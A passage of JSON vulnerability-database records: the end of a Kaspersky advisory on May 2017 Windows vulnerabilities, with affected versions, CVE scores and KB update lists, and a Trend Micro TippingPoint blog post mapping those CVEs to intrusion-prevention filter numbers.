\nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems 
Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2016 (Server Core installation)\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0212>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0259>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) 
\n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning 
\n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0259](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0259>)1.9Warning \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0212>)5.4High \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning \n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4038788](<http://support.microsoft.com/kb/4038788>) \n[4016871](<http://support.microsoft.com/kb/4016871>) 
\n[4019474](<http://support.microsoft.com/kb/4019474>) \n[4019215](<http://support.microsoft.com/kb/4019215>) \n[4019216](<http://support.microsoft.com/kb/4019216>) \n[4019473](<http://support.microsoft.com/kb/4019473>) \n[4019472](<http://support.microsoft.com/kb/4019472>) \n[4019213](<http://support.microsoft.com/kb/4019213>) \n[4019214](<http://support.microsoft.com/kb/4019214>)\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11009 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": 
"2020-09-29T00:00:00", "id": "KLA11009", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11009/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2017-05-18T08:47:17", "description": "\n\nAlthough I\u2019m still dreaming of the sandy beaches of Cancun, it\u2019s time to get back to reality. Security vulnerabilities never take a holiday and this week is no exception. In addition to our normal Digital Vaccine (DV) package delivered earlier this week, we also issued an out-of-band DV package to address zero-day vulnerabilities for Intel Active Management Technology (AMT) ([CVE-2017-5689](<https://nvd.nist.gov/vuln/detail/CVE-2017-5689>)) and Windows Defender ([CVE-2017-0290](<https://nvd.nist.gov/vuln/detail/CVE-2017-0290>)).\n\nThe Intel AMT vulnerability is an escalation of privilege vulnerability that allows an unprivileged attacker to gain control of the manageability features provided by the affected Intel AMT products. The Windows Defender vulnerability is much scarier because it allows a remote attacker to take over a system without any interaction from the system owner. Just the mere execution of Windows Defender scanning an email or instant message from an attacker is enough. But don\u2019t worry \u2013 customers using TippingPoint solutions are protected from these vulnerabilities with the following DV filters:\n\n * 28214: HTTP: Null response digest\n * 28221: HTTP: Microsoft Malware Protection Engine mpengine Type Confusion Vulnerability\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Microsoft updates released on or before May 9, 2017. Microsoft released patches for 55 new CVEs in Internet Explorer, Edge, Office, Windows, and .NET Framework. A total of 14 of these CVEs are rated Critical while the rest are rated Important in severity. The following table maps Digital Vaccine filters to the Microsoft updates. 
Filters marked with an (*) shipped prior to this DV package, providing zero-day protection for our customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [May 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/5/5/the-may-2017-security-update-review>):\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-0064 | | Insufficient Vendor Information \nCVE-2017-0077 | 28112 | \nCVE-2017-0171 | | Insufficient Vendor Information \nCVE-2017-0175 | 28183 | \nCVE-2017-0190 | | Insufficient Vendor Information \nCVE-2017-0212 | | Insufficient Vendor Information \nCVE-2017-0213 | 28184 | \nCVE-2017-0214 | 28189 | \nCVE-2017-0220 | 28198 | \nCVE-2017-0221 | 28114 | \nCVE-2017-0222 | | Insufficient Vendor Information \nCVE-2017-0224 | | Insufficient Vendor Information \nCVE-2017-0226 | | Insufficient Vendor Information \nCVE-2017-0227 | 28130 | \nCVE-2017-0228 | *27538 | \nCVE-2017-0229 | | Insufficient Vendor Information \nCVE-2017-0230 | | Insufficient Vendor Information \nCVE-2017-0231 | | Insufficient Vendor Information \nCVE-2017-0233 | | Insufficient Vendor Information \nCVE-2017-0234 | *27532 | \nCVE-2017-0235 | | Insufficient Vendor Information \nCVE-2017-0236 | *27536 | \nCVE-2017-0238 | *27540 | \nCVE-2017-0240 | *27541, *27542 | \nCVE-2017-0241 | | Insufficient Vendor Information \nCVE-2017-0242 | | Insufficient Vendor Information \nCVE-2017-0243 | 28192 | \nCVE-2017-0244 | | Insufficient Vendor Information \nCVE-2017-0245 | 28185 | \nCVE-2017-0246 | 28111 | \nCVE-2017-0248 | | Insufficient Vendor Information \nCVE-2017-0254 | | Insufficient Vendor Information \nCVE-2017-0255 | | Insufficient Vendor Information \nCVE-2017-0258 | 28199 | \nCVE-2017-0259 | 28200 | \nCVE-2017-0261 | | Insufficient Vendor Information \nCVE-2017-0262 | | Insufficient Vendor Information \nCVE-2017-0263 | 28186 | \nCVE-2017-0264 | | Insufficient Vendor Information \nCVE-2017-0265 | | 
Insufficient Vendor Information \nCVE-2017-0266 | 28193 | \nCVE-2017-0267 | | Insufficient Vendor Information \nCVE-2017-0268 | | Insufficient Vendor Information \nCVE-2017-0269 | | Insufficient Vendor Information \nCVE-2017-0270 | | Insufficient Vendor Information \nCVE-2017-0271 | | Insufficient Vendor Information \nCVE-2017-0272 | | Insufficient Vendor Information \nCVE-2017-0273 | | Insufficient Vendor Information \nCVE-2017-0274 | | Insufficient Vendor Information \nCVE-2017-0275 | | Insufficient Vendor Information \nCVE-2017-0276 | | Insufficient Vendor Information \nCVE-2017-0277 | | Insufficient Vendor Information \nCVE-2017-0278 | | Insufficient Vendor Information \nCVE-2017-0279 | | Insufficient Vendor Information \nCVE-2017-0280 | | Insufficient Vendor Information \nCVE-2017-0281 | | Insufficient Vendor Information \n \n \n\n**Zero-Day Filters**\n\nThere are 14 new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. 
You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website.\n\n**_Adobe (5)_**\n\n * 28094: ZDI-CAN-4564: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28099: ZDI-CAN-4565: Zero Day Initiative Vulnerability (Adobe Flash)\n * 28100: ZDI-CAN-4566: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28101: ZDI-CAN-4567: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)\n * 28202: ZDI-CAN-4715, 4716: Zero Day Initiative Vulnerability (Adobe Reader DC)\n\n**_EMC (6)_**\n\n * 28102: ZDI-CAN-4694: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28103: ZDI-CAN-4695: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28104: ZDI-CAN-4696: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28105: ZDI-CAN-4698: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28106: ZDI-CAN-4699: Zero Day Initiative Vulnerability (EMC Data Protection Advisor)\n * 28107: ZDI-CAN-4710: Zero Day Initiative Vulnerability (EMC AppSync)\n\n**_NetGain (3)_**\n\n * 28108: ZDI-CAN-4749: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28109: ZDI-CAN-4750: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n * 28110: ZDI-CAN-4751: Zero Day Initiative Vulnerability (NetGain Enterprise Manager)\n\n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its [Disclosure 
Policy](<http://zerodayinitiative.com/advisories/disclosure_policy/>).\n\nThree of the filters we have for this month\u2019s Microsoft bulletins are a direct result of the Zero Day Initiative\u2019s Pwn2Own contest held in March. These filters have been updated to reflect the fact that the vulnerabilities have been patched:\n\n * 27532: HTTP: Microsoft Edge Chakra JIT Array Memory Corruption Vulnerability (Pwn2Own)\n * 27538: HTTP: Microsoft Edge Chakra Array Splice Use-After-Free Vulnerability (Pwn2Own)\n * 27540: HTTP: Microsoft Edge Chakra Array Unshift Buffer Overflow Vulnerability (Pwn2Own)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-1-2017/>).", "cvss3": {}, "published": "2017-05-12T16:47:57", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of May 8, 2017", "type": "trendmicroblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0290", "CVE-2017-0248", "CVE-2017-5689", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0220", "CVE-2017-0224", "CVE-2017-0281", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0254", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0264", "CVE-2017-0077", "CVE-2017-0255", "CVE-2017-0221", "CVE-2017-0243", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0242", "CVE-2017-0262", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0265", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", 
"CVE-2017-0261", "CVE-2017-0175"], "modified": "2017-05-12T16:47:57", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-may-8-2017/", "id": "TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}